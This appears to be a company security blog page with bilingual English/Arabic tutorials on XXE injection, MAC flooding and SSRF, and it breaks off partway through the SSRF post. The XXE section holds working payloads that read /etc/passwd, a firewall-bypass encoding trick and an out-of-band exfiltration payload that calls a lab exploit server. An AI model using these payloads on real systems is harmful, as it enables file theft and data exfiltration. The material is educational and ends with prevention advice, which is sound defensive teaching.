تخيل عالماً أصبحت فيه الخدمات المصرفية عبر الإنترنت محفوفة بالمخاطر، وكل نقرة على الفأرة قد تكون ثغرة أمنية، والبيانات الحساسة معرضة للسرقة باستمرار. للأسف، هذا هو الواقع الذي ينتظرك بدون استراتيجية أمن سيبراني قوية.

How Can You Trust Ethical Hackers?

<h2>Overview about XML External Entity Injection (XXE)</h2>

XML External Entity Injection (XXE) is a web security vulnerability listed in the OWASP Top 10 under the category of &ldquo;A05:2021-Security Misconfiguration.&rdquo; It arises when the server processes XML data unsafely. This vulnerability allows attackers to read internal files on the system, interact with internal services not accessible to the public via Server-Side Request Forgery (SSRF), or perform Denial of Service (DoS) attacks on the server.

<h2>Types of XXE</h2>

<h3>In-band XXE</h3>

This is the easiest type. Any action you perform will be reflected in the response, but the server will not necessarily display an error inside the response.

<h3>Out-of-band XXE</h3>

In this type, the attacker will not receive an immediate response from the web application, making it harder to detect and exploit.

First, let&#39;s understand what XML (Extensible Markup Language) is. XML is a data format used for web services to exchange data, such as in SOAP and REST. It can also be used in image formats like SVG and documents like DOCX, making the attack surface massive.

<img alt="" src="/media/blog/2024/07/29/one-one.png" style="height:269px; width:512px" />

<h2>&nbsp;</h2>

<h2>How to Detect XXE</h2>

<img alt="" src="/media/blog/2024/07/29/two-two.png" style="height:221px; width:512px" />

Here is an example of an API endpoint where you can change your profile name using the endpoint &ldquo;/api/data.&rdquo; As you can see, the value of the attribute name is reflected in the response, and the request itself is XML-based. Let&#39;s try to inject an external entity.

First, we need to create a Document Type Definition (DTD) like this:

&lt;!DOCTYPE name []&gt;

Here, <code>name</code> is the root element of the XML document. It indicates that the XML document will have a root element named <code>&lt;name&gt;</code>. Now, let&#39;s create an entity:

&lt;!ENTITY ammar &quot;Trust Line Write Up!&quot;&gt;.

Here, I declared an entity named <code>ammar</code> that has the value of &quot;Trust Line Write Up!&quot;. Now, we have everything we need, so let&#39;s combine the DTD with the entity:

&lt;!DOCTYPE name [

&lt;!ENTITY ammar &quot;Trust Line Write Up!&quot;&gt;

]&gt;

&nbsp;

<img alt="" src="/media/blog/2024/07/29/three-three.png" style="height:235px; width:512px" />

As you can see, nothing happens. The response should contain &quot;Trust Line Write Up!&quot;. This happens because we didn&#39;t call the entity we created. To do that, we need to call it inside the name entity like this: &amp;ammar;



<img alt="" src="/media/blog/2024/07/29/four-four.png" style="height:200px; width:512px" />

<h2>&nbsp;</h2>

<h2>Exploiting External Entity</h2>

Now that we can control the response from the DTD we created, how can we read files on the system?

Instead of retrieving a hardcoded value like &quot;Trust Line Write Up!&quot;, let&#39;s read a file on the system, such as &quot;/etc/passwd&quot;. We can achieve this by using the keyword &quot;SYSTEM&quot;, which indicates that the entity&#39;s value should be read from an external file. So, our previous payload will change to this:

&lt;!DOCTYPE name [

&lt;!ENTITY ammar SYSTEM &quot;file:///etc/passwd&quot;&gt;

]&gt;

And don&#39;t forget to call it using <code>&amp;ammar;</code>

&nbsp;

<img alt="" src="/media/blog/2024/07/29/five-five.png" style="height:269px; width:512px" />

&nbsp;

Let&#39;s analyze the payload more. We said that the &quot;SYSTEM&quot; keyword will retrieve data from an external file. But what happens after the &quot;SYSTEM&quot; keyword? I used a <code>file</code> protocol to read files in the internal system, but you can utilize other protocols like <code>http://</code>. This can help escalate the XXE attack with SSRF to discover open ports internally, or we can use it to check for blind XXE.

<h2>&nbsp;</h2>

<h2>XXE Tricks</h2>

Most APIs nowadays send and receive JSON data format in their API endpoints. One cool trick is that you can still test XXE at these endpoints because most APIs support both JSON and XML. How can we test that? We can either manually change the request from JSON to XML or use a Burp Extension called &ldquo;Content Type Converter&rdquo;. Let&#39;s take an example.

<img alt="" src="/media/blog/2024/07/29/six-six.png" style="height:178px; width:512px" />

&nbsp;

The same endpoint sends our data in a JSON format, so let&#39;s change the data using the previous extension.

<img alt="" src="/media/blog/2024/07/29/seven.png" />

<img alt="" src="/media/blog/2024/07/29/eight.png" style="height:220px; width:512px" />

&nbsp;

If you send it and the server does not respond with an error, it means that the server accepts XML as a content type, so you can try the previous attack.

Another trick is to encode the content of the payload using different encoding methods. For example, you can change the encoding to <code>UTF-7</code> and encode the payload content. This trick can be used to bypass Web Application Firewalls (WAF).

&nbsp;

<img alt="" src="/media/blog/2024/07/29/nin.png" style="height:345px; width:512px" />

<h2>&nbsp;</h2>

<h2>Exfiltrate data in blind XXE</h2>

I will use this <a href="https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration">lab</a> from PortSwigger to demonstrate this concept. First thing the goal of this lab is to read the content of the /etc/hostname in a blind fashion.

&nbsp;

<img alt="" src="/media/blog/2024/07/29/ten.png" style="height:196px; width:512px" />

&nbsp;

This is the normal request if we try the previous attack let&rsquo;s see what happen

<img alt="" src="/media/blog/2024/07/29/eleven.png" />

We got this message should we stop here? Of course not. It might be vulnerable to blind XXE so in order to test for that when need to utilize other protocol the one defined in the previous example http:// to see if there&rsquo;s an interaction or not?

&nbsp;

<img alt="" src="/media/blog/2024/07/29/tweeleve.png" style="height:230px; width:512px" />

&nbsp;

So, this is the request I sent to test for the blind interaction let&rsquo;s explain the payload a little bit.

<pre>
<code>
&lt;!DOCTYPE Anything [&lt;!ENTITY % TrustLine SYSTEM &quot;&lt;https://exploit-0a2f006d030d683e80597f0901a4009b.exploit-server.net/TrustLine.sa&gt;&quot;&gt; %TrustLine;]&gt;

</code></pre>

Here we know what is the <code>&lt;!DOCTYPE Anything []&gt;</code> from the previous example but we have something different here before the entity name we have <code>%</code> sign we were using only the entity name. So, what is the difference? The previous example we used something called General Entity where we need to call it in order to work. When we add the <code>%</code> before entity name we call it Parameter Entities, which allows it to reference it without <code>&amp;TrustLine;</code>. As you can see in the above payload we call the Parameter Entities in the same DTD. The URL part in the payload is an attacker control server in this case I have used the Lab Server but in real life engagement you can use your own server or, webhook.site, ngrok. All these tools will do the trick. So after sending the request we got this in the attacker server log.

&nbsp;

<img alt="" src="/media/blog/2024/07/29/thertten.png" />

which means the server interact with our own server. This is the detection part now let&rsquo;s go with the exfiltration part.

So first thing we need to create a DTD file in our server (attacker server) so we can host that malicious file to the server.

&nbsp;

<img alt="" src="/media/blog/2024/07/29/forteen.png" style="height:100px; width:512px" />

&nbsp;

Our DTD file will contain this contents and I will name it <code> TrustLine.dtd</code>.

So, let&rsquo;s explain the payload used in the DTD file.

First Entity will retrieve the desired file from the system in our case to complete the lab I have to read the contents of the /etc/hostname file so I will use that.

Second Entity is to send data to our server so it will need another entity inside to send the data retrieved from the file Entity and then we will send the data to our server (attacker server) but you can notice that there html encoding for the reference Entity data using this<code> &amp;#x25;</code> if we didn&rsquo;t encoded the inner entity our payload will not be working after that I have to call the sendTo and the data to receive the data in my server.

&nbsp;

<img alt="" src="/media/blog/2024/07/29/fifteen.png" style="height:225px; width:512px" />

&nbsp;

The request will look like the image above same payload used in the previous example however, I change the URL to point to our malicious DTD file.

After we send the request you can see the attacker server logs.

&nbsp;

<img alt="" src="/media/blog/2024/07/29/sixteen.png" />

The server interacted with our malicious DTD file and then our malicious file has been executed and sent the data to our server. Note here you can literally extract any data by utilizing the PHP protocol with filter like this:

&nbsp;

<img alt="" src="/media/blog/2024/07/29/lasttt.png" style="height:100px; width:512px" />



&nbsp;

<h2>Preventing XXE</h2>

<ol>
	<li>
	Disable DTD processing in your XML parser.
	</li>
	<li>
	Use secure parsers.
	</li>
	<li>
	Validate and sanitize all XML inputs.
	</li>
</ol>

<h2>نظرة عامة حول حقن الكيانات الخارجية في XML (XXE)</h2>

حقن الكيانات الخارجية في XML (XXE) هو ثغرة أمنية في الويب مُدرجة ضمن قائمة OWASP Top 10 تحت فئة &quot;A05:2021-خطأ في تكوين الأمان&quot;. تنشأ هذه الثغرة عندما يعالج الخادم بيانات XML بشكل غير آمن. تتيح هذه الثغرة للمهاجمين قراءة الملفات الداخلية على النظام والتفاعل مع الخدمات الداخلية غير المتاحة للجمهور عبر تزوير الطلبات من جانب الخادم (SSRF) أو تنفيذ هجمات حجب الخدمة (DoS) على الخادم.

<h2>أنواع XXE</h2>

<h3>ضمن النطاق XXE</h3>

هذا هو النوع الأسهل. أي إجراء تقوم به سينعكس في الاستجابة، ولكن الخادم قد لا يعرض خطأ داخل الاستجابة بالضرورة.

<h3>خارج النطاق XXE</h3>

في هذا النوع لن يتلقى المهاجم استجابة فورية من تطبيق الويب، مما يجعل من الصعب اكتشافه واستغلاله.

<h2>فهم XML</h2>

أولاً دعنا نفهم ما هو XML (لغة التوصيف الموسعة). XML هو تنسيق بيانات يُستخدم في خدمات الويب لتبادل البيانات مثل في SOAP و REST. يمكن أيضًا استخدامه في تنسيقات الصور مثل SVG والمستندات مثل DOCX مما يجعل سطح الهجوم هائلًا.

<img alt="" src="/media/blog/2024/07/29/1.png" style="height:221px; width:512px" />

&nbsp;

<h2>كيفية اكتشاف XXE</h2>

<img alt="" src="/media/blog/2024/07/29/2.png" style="height:221px; width:512px" />

إليك مثال على نقطة نهاية API حيث يمكنك تغيير اسم ملفك الشخصي باستخدام نقطة النهاية &quot;/api/data&quot;. كما ترى، يتم عكس قيمة اسم الخاصية في الاستجابة والطلب نفسه يعتمد على XML. دعنا نحاول حقن كيان خارجي.

أولاً، نحتاج إلى إنشاء تعريف نوع المستند (DTD) مثل هذا:

&lt;!DOCTYPE name []&gt;

هنا name هو العنصر الجذر لوثيقة XML. يشير إلى أن وثيقة XML سيكون لها عنصر جذر يسمى&lt;name&gt;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;الآن دعنا ننشئ كيان:

&lt;&rdquo;!ENTITY ammar &ldquo;Trust Line Write Up! &gt;

<img alt="" src="/media/blog/2024/07/29/3.png" />

&nbsp;

هنا أعلنت عن كيان اسمه &lt;ammar&gt; وله قيمة &quot;Trust Line Write Up!&quot;.

الآن لدينا كل ما نحتاجه لذا دعنا ندمج DTD مع الكيان:

&lt;!DOCTYPE name [

&lt;!ENTITY ammar &quot;Trust Line Write Up!&quot;&gt;

]&gt;

كما ترى، لم يحدث شيء. يجب أن تحتوي الاستجابة على &quot;Trust Line Write Up!&quot;. يحدث هذا لأننا لم ندع الكيان الذي أنشأناه. للقيام بذلك نحتاج إلى استدعائه داخل عنصر name هكذا&nbsp; .&amp;ammar;:

<img alt="" src="/media/blog/2024/07/29/4.png" style="height:200px; width:512px" />

&nbsp;

<h2>استغلال الكيان الخارجي</h2>

الآن بعد أن تمكنا من التحكم في الاستجابة من خلال DTD التي أنشأناها، كيف يمكننا قراءة الملفات على النظام؟ بدلاً من استرجاع قيمة ثابتة مثل &quot;Trust Line Write Up!&quot;، دعنا نقرأ ملفًا على النظام مثل &quot;/etc/passwd&quot;. يمكننا تحقيق ذلك باستخدام الكلمة المفتاحية &quot;SYSTEM&quot; التي تشير إلى أن قيمة الكيان يجب أن تُقرأ من ملف خارجي. لذا سيتغير الحمولة السابقة إلى هذا:

&lt;!DOCTYPE name [

&lt;!ENTITY ammar SYSTEM &quot;file:///etc/passwd&quot;&gt;

]&gt;

ولا تنسى استدعائها باستخدام&nbsp; .&amp;ammar;

<img alt="" src="/media/blog/2024/07/29/5_qBB8nk7.png" />

دعنا نحلل الحمولة أكثر. قلنا أن الكلمة المفتاحية &quot;SYSTEM&quot; ستسترجع البيانات من ملف خارجي. ولكن ماذا يحدث بعد الكلمة المفتاحية &quot;SYSTEM&quot;؟ استخدمت بروتوكول file لقراءة الملفات في النظام الداخلي ولكن يمكنك استخدام بروتوكولات أخرى مثل http:// يمكن أن يساعد هذا في تصعيد هجوم XXE مع SSRF لاكتشاف المنافذ المفتوحة داخليًا أو يمكننا استخدامه للتحقق من XXE الأعمى.

<h2>حيل XXE</h2>

ترسل معظم واجهات برمجة التطبيقات (API) وتستقبل تنسيق بيانات JSON في نقاط النهاية الخاصة بها. حيلة رائعة هي أنه يمكنك اختبار XXE في هذه النقاط النهائية لأن معظم واجهات برمجة التطبيقات تدعم كل من JSON و .XML كيف يمكننا اختبار ذلك؟ يمكننا إما تغيير الطلب يدويًا من JSON إلى XML أو استخدام ملحق Burp يسمى

&quot;Content Type Converter&quot;. دعنا نأخذ مثالاً.

<img alt="" src="/media/blog/2024/07/29/6.png" />ترسل نفس نقطة النهاية بياناتنا بتنسيق JSON لذا دعنا نغير البيانات باستخدام الملحق السابق.

<img alt="" src="/media/blog/2024/07/29/7.png" /><img alt="" src="/media/blog/2024/07/29/8.png" />

إذا أرسلتها ولم يستجب الخادم بخطأ فهذا يعني أن الخادم يقبل XML كنوع محتوى لذا يمكنك محاولة الهجوم السابق.

حيلة أخرى هي تشفير محتوى الحمولة باستخدام طرق تشفير مختلفة. على سبيل المثال، يمكنك تغيير التشفير إلى UTF-7 وتشفير محتوى الحمولة. يمكن استخدام هذه الحيلة لتجاوز جدران حماية تطبيقات الويب .(WAF)

<img alt="" src="/media/blog/2024/07/29/9.png" />

<h2>استخراج البيانات في XXE الأعمى ( الغير مرئية )</h2>

سأستخدم هذا <a href="https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration">المختبر</a> من PortSwigger لتوضيح هذا المفهوم. أول شيء هدف هذا المختبر هو قراءة محتويات /etc/hostname بطريقة عمياء.

<img alt="" src="/media/blog/2024/07/29/one-el.png" style="height:764px; width:2000px" />هذا هو الطلب العادي إذا حاولنا الهجوم السابق، دعنا نرى ما يحدث.

<img alt="" src="/media/blog/2024/07/29/two-el.png" />

حصلنا على هذه الرسالة هل يجب أن نتوقف هنا؟ بالطبع لا.

قد يكون عرضة لـ XXE الأعمى لذا لاختبار ذلك عندما نحتاج إلى استخدام بروتوكول آخر المعرفة في المثال السابق http:// لنرى إذا كان هناك تفاعل أم لا؟

<img alt="" src="/media/blog/2024/07/29/three-el.png" />

إذن هذا هو الطلب الذي أرسلته لاختبار التفاعل الأعمى، دعنا نشرح الحمولة قليلاً.

<pre>
<code>
&lt;!DOCTYPE Anything [&lt;!ENTITY % TrustLine SYSTEM &quot;&lt;https://exploit-0a2f006d030d683e80597f0901a4009b.exploit-server.net/TrustLine.sa&gt;&quot;&gt; %TrustLine;]&gt;

</code></pre>

هنا نعرف ما هو &lt;!DOCTYPE Anything []&gt; من المثال السابق ولكن لدينا شيء مختلف هنا قبل اسم الكيان لدينا علامة&nbsp; .% كنا نستخدم فقط اسم الكيان. إذن ما الفرق؟ المثال السابق استخدمنا شيئًا يسمى الكيان العام حيث نحتاج إلى استدعائه ليعمل. عندما نضيف % قبل اسم الكيان نسميه الكيانات البارامترية التي تسمح بالرجوع إليها بدون&nbsp; &nbsp; .&amp;TrustLine;&nbsp; كما ترى في الحمولة أعلاه نستدعي الكيانات البارامترية في نفس .DTD جزء URL في الحمولة هو خادم يتحكم فيه المهاجم، في هذه الحالة استخدمت خادم المختبر ولكن في التعامل الحقيقي يمكنك استخدام خادمك الخاص أو &nbsp; &nbsp; &nbsp; webhook.site, ngrok . كل هذه الأدوات ستفي بالغرض. بعد إرسال الطلب حصلنا على هذا في سجل خادم المهاجم.





<img alt="" src="/media/blog/2024/07/29/five-el.png" />

هذا يعني أن الخادم تفاعل مع الخادم الخاص بنا. هذا هو جزء الكشف، الآن دعونا ننتقل إلى جزء استخراج البيانات.

أول شيء نحتاج إلى إنشاء ملف DTD في الخادم الخاص بنا (خادم المهاجم) حتى نتمكن من استضافة ذلك الملف الخبيث إلى الخادم.

&nbsp;

<img alt="" src="/media/blog/2024/07/29/lasttt_SRDDVQO.png" style="height:392px; width:2000px" />



ملف DTD الخاص بنا سيحتوي على هذه المحتويات وسأسميه .TrustLine.dtd

دعونا نشرح الحمولة المستخدمة في ملف .DTD

الكيان الأول سيسترجع الملف المطلوب من النظام في حالتنا لإكمال المختبر يجب علي قراءة محتويات ملف&nbsp; /etc/hostname &nbsp; لذلك سأستخدم ذلك.

الكيان الثاني هو لإرسال البيانات إلى الخادم الخاص بنا لذلك سيحتاج إلى كيان آخر داخلي لإرسال البيانات المسترجعة من الكيان الملف ثم سنرسل البيانات إلى الخادم الخاص بنا (خادم المهاجم) ولكن يمكنك ملاحظة أنه هناك ترميز HTML لبيانات الكيان المرجعي باستخدام هذا % إذا لم نقم بترميز الكيان الداخلي فلن تعمل الحمولة الخاصة بنا بعد ذلك يجب علي استدعاء sendTo والبيانات لاستلام البيانات في خادمي.

&nbsp;

<img alt="" src="/media/blog/2024/07/29/onnnee.png" style="height:225px; width:512px" />



سيبدو الطلب مثل الصورة أعلاه نفس الحمولة المستخدمة في المثال السابق ومع ذلك، قمت بتغيير عنوان URL للإشارة إلى ملف DTD الخبيث الخاص بنا.

بعد إرسال الطلب يمكنك رؤية سجلات خادم المهاجم.

<img alt="" src="/media/blog/2024/07/29/twooo.png" style="height:177px; width:512px" />

تفاعل الخادم مع ملف DTD الخبيث الخاص بنا ثم تم تنفيذ الملف الخبيث الخاص بنا وأرسل البيانات إلى الخادم الخاص بنا. لاحظ هنا يمكنك حرفيًا استخراج أي بيانات باستخدام بروتوكول PHP مع مرشح مثل هذا:





<img alt="" src="/media/blog/2024/07/29/threeee.png" style="height:100px; width:512px" />

<h2>منع XXE</h2>

<ol>
	<li>تعطيل معالجة DTD في محلل XML الخاص بك.</li>
	<li>استخدام محللات آمنة.</li>
	<li>التحقق وتنقية جميع مدخلات .XML</li>
</ol>

XML-External-Entity-XXE-Attack

XML External Entity Injection (XXE) is a web security vulnerability listed in the OWASP Top 10 under the category of “A05:2021-Security Misconfiguration.” It arises when the server processes XML data unsafely. This vulnerability allows attackers to read internal files on the system, interact with internal services not accessible to the public via Server-Side Request Forgery (SSRF), or perform Denial of Service (DoS) attacks on the server.

حقن الكيانات الخارجية في XML (XXE) هو ثغرة أمنية في الويب مُدرجة ضمن قائمة OWASP Top 10 تحت فئة "A05:2021-خطأ في تكوين الأمان". تنشأ هذه الثغرة عندما يعالج الخادم بيانات XML بشكل غير آمن. تتيح هذه الثغرة للمهاجمين قراءة الملفات الداخلية على النظام والتفاعل مع الخدمات الداخلية غير المتاحة للجمهور عبر تزوير الطلبات من جانب الخادم (SSRF) أو تنفيذ هجمات حجب الخدمة (DoS) على الخادم.

XML External Entity (XXE) Attack

هجمة ال XML External Entity (XXE)

<h3>Here we will discussed how the attacker exploits the switch to perform MAC flooding attack:</h3>

<h2> 
First of all. What is the mac?</h2>

MAC (Media Access Control) address is a unique identifier assigned to a network&nbsp; for communications on a physical network segment.

<h2> 
Why do we have MAC?</h2>

It is used for identify and&nbsp; secure communication between devices. 
&nbsp;

<h2>What is Mac Flooding attack?</h2>

A MAC flooding attack overwhelms a switch&rsquo;s MAC address table with fake MAC addresses, forcing it to broadcast all traffic to all ports, making it vulnerable to data&nbsp;interception.

&nbsp;

<h2>What is the switch and how it works?</h2>

A network switch is a hardware device that connects multiple devices within a local area network (LAN) and enables communication between them. using MAC addresses to forward data packets only to the specific device for which the data is intended.

A switch forwards data only to the specific port associated with the destination MAC address. This makes it much harder for an attacker to intercept traffic not intended for their device.

&nbsp;

<h2>Disadvantage of the switch</h2>

As we discussed above , the switch is forwards data only to the specific port associated with the destination MAC address and save it in CAM table. But when the CAM table is full. The switch forces to act as a hub and broadcast each traffic comes.

&nbsp;

<h2>What is the CAM table?</h2>

data structure used by the switch to store and map MAC addresses to specific switch ports. Which is allows the switch to efficiently forward data frames to the correct destination port based on the MAC address, improving network performance and security.

<img alt="" src="/media/blog/2024/10/09/scrnn1.jpeg" style="height:457px; width:854px" />

&nbsp;

How the switch broadcasting

<img alt="" src="/media/blog/2024/10/09/scrnn2.png" style="height:714px; width:1600px" />

<h2>How can the attacker exploits the switch to perform mac flooding attack?</h2>

An attacker initiates a large number of network requests, flooding the switch&rsquo;s CAM table with numerous fake MAC addresses. This overwhelms the switch, causing it to exceed its capacity and revert to broadcast mode, where it sends all incoming Ethernet frames to every device on the network, similar to the behavior of a hub. In this state, the attacker can exploit the situation by spoofing the MAC address of a legitimate user, effective intercepting or redirecting the victim&#39;s network traffic.

<img alt="" src="/media/blog/2024/10/09/scrnn3.jpeg" style="height:368px; width:514px" />

&nbsp;

After sending large numbers of fake frames the cam table will be full and then it have to broadcast each frame.

<img alt="" src="/media/blog/2024/10/09/scrnn4.jpeg" style="height:552px; width:898px" />

<h2>How to detect mac flooding?</h2>

Can be detected by Monitor MAC Address Table: Regularly monitor the switch&rsquo;s&nbsp; table for an unusually high number of MAC addresses being associated with a single switch port or multiple ports, significant increase in the number of MAC addresses is an indicator of a MAC flooding attack.

&nbsp;

<h2>how to response if mac flooding attack happened?</h2>

1. Isolate the Malicious Device:

<ul>
	<li>try to Quickly identify the port or device generating the excessive number of MAC addresses.</li>
</ul>

2. Clear the MAC Address Table (CAM Table):

<ul>
	<li>Clear the CAM table on the switch to remove the flooded MAC addresses. This will help restore normal traffic flow and allow legitimate MAC addresses to be relearned.</li>
</ul>

&nbsp;

<h2>How can prevent MAC flooding attacks from occurring?</h2>

1. Implement Port Security on Switches:

<ul>
	<li>Configure port security to limit the number of MAC addresses that can be learned on each switch port. For example, set a maximum of 1 or 2 MAC addresses per port for regular user devices.</li>
</ul>

2. Enable Dynamic ARP Inspection (DAI):

<ul>
	<li>Configure DAI to monitor and validate ARP packets on the network. This helps prevent ARP spoofing, which is often used alongside MAC flooding.</li>
</ul>

&nbsp;

<h2>References :</h2>

<a href="https://www.geeksforgeeks.org/difference-between-hub-and-switch/">**</a><a href="https://www.geeksforgeeks.org/difference-between-hub-and-switch/**">https://www.geeksforgeeks.org/difference-between-hub-and-switch/**</a>

<a href="https://www.infosectrain.com/blog/mac-flooding-attack/">**</a><a href="https://www.infosectrain.com/blog/mac-flooding-attack/**">https://www.infosectrain.com/blog/mac-flooding-attack/**</a>

eLearnSecurity (ejpt slides) .

هنا سنتحدث عن كيفية استغلال المهاجم للمحول لتنفيذ هجوم إغراق عناوين MAC:

<h2>أولاً، ما هو عنوان MAC؟</h2>

عنوان MAC (التحكم في الوصول إلى الوسائط) هو معرف فريد يُعين لشبكة للاتصالات في جزء الشبكة المادي.

&nbsp;

<h2>لماذا نستخدم عنوان MAC؟</h2>

يُستخدم لتحديد وتأمين الاتصال بين الأجهزة.

&nbsp;

<h2>ما هو هجوم إغراق MAC؟</h2>

هجوم إغراق MAC يستغل جدول عناوين MAC الخاص بالمحول من خلال إغراقه بعناوين MAC مزيفة، مما يجبر المحول على إرسال جميع حركة البيانات إلى جميع المنافذ، مما يجعله عرضة لاعتراض البيانات.

&nbsp;

<h2>ما هو المحول وكيف يعمل؟</h2>

المحول هو جهاز مادي يربط بين عدة أجهزة داخل شبكة محلية (LAN) ويُمكِّنها من التواصل فيما بينها. باستخدام عناوين MAC، يقوم المحول بتوجيه حزم البيانات إلى الجهاز المحدد الذي يُراد إرسال البيانات إليه فقط.

المحول يوجه البيانات فقط إلى المنفذ المرتبط بعنوان MAC الوجهة. هذا يجعل من الصعب على المهاجم اعتراض البيانات التي لا تستهدف جهازه.

&nbsp;

<h2>عيوب المحول</h2>

كما ناقشنا أعلاه، يقوم المحول بتوجيه البيانات فقط إلى المنفذ المرتبط بعنوان MAC الوجهة وحفظه في جدول CAM. ولكن عندما يمتلئ جدول CAM، يجبر المحول على التصرف كـ&quot;موزع&quot; ويبث كل حركة المرور التي يستقبلها.

&nbsp;

<h2>ما هو جدول CAM؟</h2>

هو بنية بيانات يستخدمها المحول لتخزين وتعيين عناوين MAC لمنافذ المحول المحددة. يسمح هذا الجدول للمحول بتوجيه حزم البيانات بكفاءة إلى منفذ الوجهة الصحيح استنادًا إلى عنوان MAC، مما يحسن من أداء الشبكة وأمنها.

<img alt="" src="/media/blog/2024/10/09/scrnn1_VRXIxEl.jpeg" style="height:457px; width:854px" />

&nbsp;

كيفية قيام المحول بالبث

<img alt="" src="/media/blog/2024/10/09/scrnn2_oE47X6d.png" style="height:714px; width:1600px" />

<h2>كيف يمكن للمهاجم استغلال المحول لتنفيذ هجوم إغراق MAC؟</h2>

يقوم المهاجم بإطلاق عدد كبير من الطلبات على الشبكة، مما يؤدي إلى إغراق جدول CAM الخاص بالمحول بعدد هائل من عناوين MAC المزيفة. هذا يربك المحول ويتسبب في تجاوز سعة الجدول، مما يجبره على التحول إلى وضع البث، حيث يرسل جميع إطارات الإيثرنت الواردة إلى كل جهاز على الشبكة، تمامًا كما يعمل الموزع. في هذه الحالة، يمكن للمهاجم استغلال الوضع عن طريق تزوير عنوان MAC الخاص بمستخدم شرعي واعتراض حركة المرور أو إعادة توجيهها بنجاح.

<img alt="" src="/media/blog/2024/10/09/scrnn3_rCeeayJ.jpeg" style="height:368px; width:514px" />

&nbsp;

بعد إرسال عدد كبير من الإطارات المزيفة، سيمتلئ جدول CAM، مما يجبر المحول على بث كل إطار.

<img alt="" src="/media/blog/2024/10/09/scrnn4_atq65rT.jpeg" style="height:552px; width:898px" />

<h2>كيف يمكن اكتشاف هجوم إغراق MAC؟</h2>

يمكن اكتشافه من خلال مراقبة جدول عناوين MAC: راقب جدول عناوين MAC الخاص بالمحول بانتظام لاكتشاف أي عدد غير طبيعي من العناوين المرتبطة بمنفذ واحد أو عدة منافذ. يعتبر الزيادة الكبيرة في عدد عناوين MAC مؤشرًا على هجوم إغراق MAC.

&nbsp;

<h2>كيف يمكن الرد في حال حدوث هجوم إغراق MAC؟</h2>

1. عزل الجهاز الضار:

<ul>
	<li>حاول تحديد المنفذ أو الجهاز الذي يولد العدد المفرط من عناوين MAC بسرعة.</li>
</ul>

2. مسح جدول عناوين MAC (جدول CAM):

<ul>
	<li>قم بمسح جدول CAM في المحول لإزالة عناوين MAC المغمورة. سيساعد ذلك في استعادة تدفق الحركة الطبيعي وتمكين المحول من إعادة تعلم عناوين MAC الشرعية.</li>
</ul>

&nbsp;

<h2>كيف يمكن منع حدوث هجمات إغراق MAC؟</h2>

1. تطبيق أمان المنافذ على المحولات:

<ul>
	<li>قم بتكوين أمان المنافذ لتحديد عدد عناوين MAC التي يمكن تعلمها على كل منفذ. على سبيل المثال، قم بتحديد حد أقصى 1 أو 2 عنوان MAC لكل منفذ للأجهزة المستخدم العادية.</li>
</ul>

2. تفعيل فحص ARP الديناميكي (DAI):

<ul>
	<li>قم بتكوين DAI لمراقبة وتحقق حزم ARP على الشبكة. يساعد هذا في منع تزوير ARP الذي غالبًا ما يُستخدم جنبًا إلى جنب مع هجمات إغراق MAC.</li>
</ul>

&nbsp;

<h2>المراجع:</h2>

<ul>
	<li>
	<a href="https://www.geeksforgeeks.org/difference-between-hub-and-switch/">*</a><a href="https://www.geeksforgeeks.org/difference-between-hub-and-switch/**">https://www.geeksforgeeks.org/difference-between-hub-and-switch/**</a>
	</li>
	<li><a href="https://www.infosectrain.com/blog/mac-flooding-attack/">*</a><a href="https://www.infosectrain.com/blog/mac-flooding-attack/**">https://www.infosectrain.com/blog/mac-flooding-attack/**</a></li>
</ul>

eLearnSecurity (ejpt slides).

MAC-Flooding-attack

A network switch is a hardware device that connects multiple devices within a local area network (LAN) and enables communication between them. using MAC addresses to forward data packets only to the specific device for which the data is intended.

المحول هو جهاز مادي يربط بين عدة أجهزة داخل شبكة محلية (LAN) ويُمكِّنها من التواصل فيما بينها. باستخدام عناوين MAC، يقوم المحول بتوجيه حزم البيانات إلى الجهاز المحدد الذي يُراد إرسال البيانات إليه فقط.

MAC Flooding attack

هجمة ال MAC Flooding

<h2>Introduction</h2>

Server-Side Request Forgery (SSRF) is a critical web security vulnerability that occurs when an attacker is able to make a server-side application send HTTP requests to an unintended location. SSRF attacks can be highly damaging, often leading to unauthorized access to internal systems, data leaks, and other severe security issues. This blog will explore the mechanics of SSRF, provide real-world examples, and offer strategies to mitigate this risk.

<h2>What is SSRF?</h2>

SSRF exploits arise when a web application is designed to fetch data from a URL provided by a user. An attacker can manipulate these URLs to make the server perform unintended actions, such as accessing internal systems, reading sensitive files, or even making HTTP requests to other systems on the network.

<img alt="" src="/media/blog/2024/07/04/hacker.png" style="height:236px; width:784px" />

&nbsp;

<h2>How SSRF Works</h2>

<ol>
	<li>
	User Input: The application accepts a URL or some form of user input that it uses to make an HTTP request.
	</li>
	<li>Request Manipulation: The attacker provides a crafted URL that tricks the server into making a request to an unintended or malicious destination.</li>
	<li>Server Execution: The server executes the request, often without adequate validation or sanitization, leading to unintended actions.</li>
</ol>

<h2>Real-World Examples of SSRF</h2>

<ol>
	<li>
	Accessing Internal Services: Many internal services (like databases, internal APIs, etc.) are not exposed to the public internet but can be accessed by other systems within the same network. SSRF can exploit this trust. For example:

	<ul>
		<li>An attacker submits a URL like <code>http://internal-service.local/admin</code> to an application that fetches the content of the given URL. The server, trusting its internal network, processes the request and exposes sensitive internal data.</li>
	</ul>
	</li>
	<li>Local File Inclusion: Some SSRF vulnerabilities can be exploited to read local files on the server. By submitting a URL such as <code>file:///etc/passwd</code>, the server might read and return the contents of the file, exposing sensitive information.</li>
	<li>Port Scanning and Network Mapping: By crafting URLs with different IP addresses and ports, an attacker can map out the internal network structure and identify other potential targets for attack.</li>
</ol>

<h2>SSRF in the Wild</h2>

GitHub SSRF Vulnerability (2020)

In March 2020, GitHub experienced a critical SSRF vulnerability in its GitHub Actions service, a popular CI/CD (Continuous Integration/Continuous Deployment) tool. This vulnerability allowed attackers to exploit GitHub Actions to access internal metadata endpoints of Amazon Web Services (AWS).

How the Attack Worked

<ol>
	<li>
	Crafted Workflow: The attacker created a malicious GitHub Actions workflow file that included a step to make an HTTP request to an AWS metadata service endpoint.
	</li>
	<li>Execution of Workflow: When the workflow was executed, the SSRF vulnerability in the GitHub Actions service allowed the HTTP request to be sent to internal AWS endpoints.</li>
	<li>Access to Sensitive Data: By querying the AWS metadata service, the attacker could access sensitive information such as AWS IAM role credentials.</li>
</ol>

Impact

